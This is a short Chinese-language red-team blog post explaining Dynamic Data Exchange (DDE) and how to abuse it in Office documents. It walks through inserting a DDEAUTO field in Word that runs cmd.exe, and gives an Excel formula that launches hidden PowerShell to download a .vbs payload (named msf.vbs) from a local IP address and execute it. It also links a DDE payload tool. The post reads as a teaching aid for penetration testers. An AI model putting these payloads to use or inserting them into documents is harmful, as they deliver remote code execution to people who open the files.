DDE

11 months ago
red.ghostwolflab.com
1 minute

DDE技术是指动态数据交换技术,它是一种在应用程序之间传输数据的方法。DDE协议是一组消息和准则,它在共享数据的应用程序之间发送消息,并使用共享内存在应用程序之间交换数据。应用程序可以使用DDE协议进行一次性数据传输和持续交换,在这种交换中,当新数据可用时,应用程序会相互发送更新。

Word

在Word文档中,可以使用DDE技术来插入字段代码,从而实现从其他应用程序(如Excel)获取数据或执行命令的功能。

首先打开Word文档,选择”插入”功能区块,点击”文档部件”——”域”。

在弹出的窗口中点击确定:

可以看到添加了一个”!异常的公式结尾”字样,右键选择”切换域代码”,将显示代码字样:

将代码修改为如下:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"}

保存文档并重新打开,会弹出两个弹窗,只需要选择”是”,即可弹出计算器窗口。

Excel

对于Excel来说,就比较简单了,只需要注入(本例为A1单元格)以下公式即可完成Payload交付:

=cmd|'/c cmd.exe /c powershell.exe -nop -w hidden iwr -outf %tmp%\\msf.vbs http://192.168.8.145/msf.vbs & %tmp%\\msf.vbs'!'A1'

工具

  • Office-DDE-Payloads

https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads